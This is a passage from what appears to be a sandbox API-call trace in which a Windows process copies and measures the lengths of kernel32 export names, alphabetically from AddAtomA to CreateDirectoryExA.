lpString1="AddAtomA") returned="AddAtomA" [0078.406] lstrlenA (lpString="ADDATOMA") returned 8 [0078.406] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0078.406] lstrlenA (lpString="ADDATOMW") returned 8 [0078.406] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0078.406] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0078.406] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0078.406] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0078.406] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0078.406] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0078.406] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0078.406] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0078.406] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0078.406] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0078.406] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0078.406] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0078.406] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0078.406] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0078.406] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0078.406] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0078.406] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0078.406] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0078.406] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0078.406] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0078.406] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0078.406] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0078.406] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0078.406] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0078.406] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0078.406] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0078.406] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0078.406] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0078.406] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0078.406] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0078.407] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0078.407] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0078.407] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0078.407] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0078.407] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0078.407] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0078.407] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0078.407] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0078.407] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0078.407] lstrlenA (lpString="BACKUPREAD") returned 10 [0078.407] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0078.407] lstrlenA (lpString="BACKUPSEEK") returned 10 [0078.407] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0078.407] lstrlenA (lpString="BACKUPWRITE") returned 11 [0078.407] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0078.407] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0078.407] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0078.407] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0078.407] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0078.407] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0078.407] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0078.407] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0078.407] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0078.407] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0078.407] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0078.407] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0078.407] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0078.407] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0078.407] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0078.407] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0078.407] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0078.407] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0078.407] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0078.407] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0078.407] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0078.407] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0078.407] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0078.408] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0078.408] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0078.408] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0078.408] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0078.408] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0078.408] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0078.408] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0078.408] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0078.408] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0078.408] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0078.408] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0078.408] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0078.408] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0078.408] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0078.408] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0078.408] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0078.408] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0078.408] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0078.408] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0078.408] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0078.408] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0078.408] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0078.408] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0078.408] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0078.408] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0078.408] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0078.408] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0078.408] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0078.408] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0078.408] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0078.408] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0078.408] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0078.408] lstrlenA (lpString="BEEP") returned 4 [0078.408] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0078.408] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0078.409] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0078.409] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0078.409] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0078.409] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0078.409] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0078.409] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0078.409] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0078.409] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0078.409] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0078.409] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0078.409] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0078.409] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0078.409] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0078.409] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0078.409] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0078.409] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0078.409] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0078.409] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0078.409] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0078.409] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0078.409] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0078.409] lstrlenA (lpString="CANCELIO") returned 8 [0078.409] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0078.409] lstrlenA (lpString="CANCELIOEX") returned 10 [0078.409] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0078.409] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0078.409] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0078.409] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0078.409] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0078.409] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0078.409] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0078.409] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0078.409] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0078.409] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0078.409] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0078.409] lstrlenA (lpString="CHECKELEVATION") returned 14 [0078.409] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0078.410] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0078.410] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0078.410] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0078.410] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0078.410] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0078.410] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0078.410] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0078.410] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0078.410] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0078.410] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0078.410] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0078.410] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0078.410] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0078.410] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0078.410] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0078.410] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0078.410] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0078.410] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0078.410] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0078.410] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0078.410] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0078.410] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0078.410] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0078.410] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0078.410] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0078.410] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0078.410] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0078.410] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0078.410] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0078.410] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0078.410] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0078.410] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0078.410] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0078.410] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0078.410] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0078.410] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0078.411] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0078.411] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0078.411] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0078.411] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0078.411] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0078.411] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0078.411] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0078.411] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0078.411] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0078.411] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0078.411] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0078.411] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0078.411] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0078.411] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0078.411] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0078.411] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0078.411] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0078.411] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0078.411] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0078.411] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0078.411] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0078.411] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0078.411] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0078.411] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0078.411] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0078.411] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0078.411] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0078.411] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0078.411] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0078.411] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0078.411] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0078.411] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0078.411] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0078.411] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0078.411] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0078.411] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0078.412] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0078.412] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0078.412] lstrlenA (lpString="COPYCONTEXT") returned 11 [0078.412] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0078.412] lstrlenA (lpString="COPYFILEA") returned 9 [0078.412] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0078.412] lstrlenA (lpString="COPYFILEEXA") returned 11 [0078.412] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0078.412] lstrlenA (lpString="COPYFILEEXW") returned 11 [0078.412] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0078.412] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0078.412] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0078.412] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0078.412] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0078.412] lstrlenA (lpString="COPYFILEW") returned 9 [0078.412] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0078.412] lstrlenA (lpString="COPYLZFILE") returned 10 [0078.412] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0078.412] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0078.412] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0078.412] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0078.412] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0078.412] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0078.412] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0078.412] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0078.412] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0078.412] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0078.412] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0078.412] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0078.412] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0078.412] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0078.412] lstrcpyA (in: 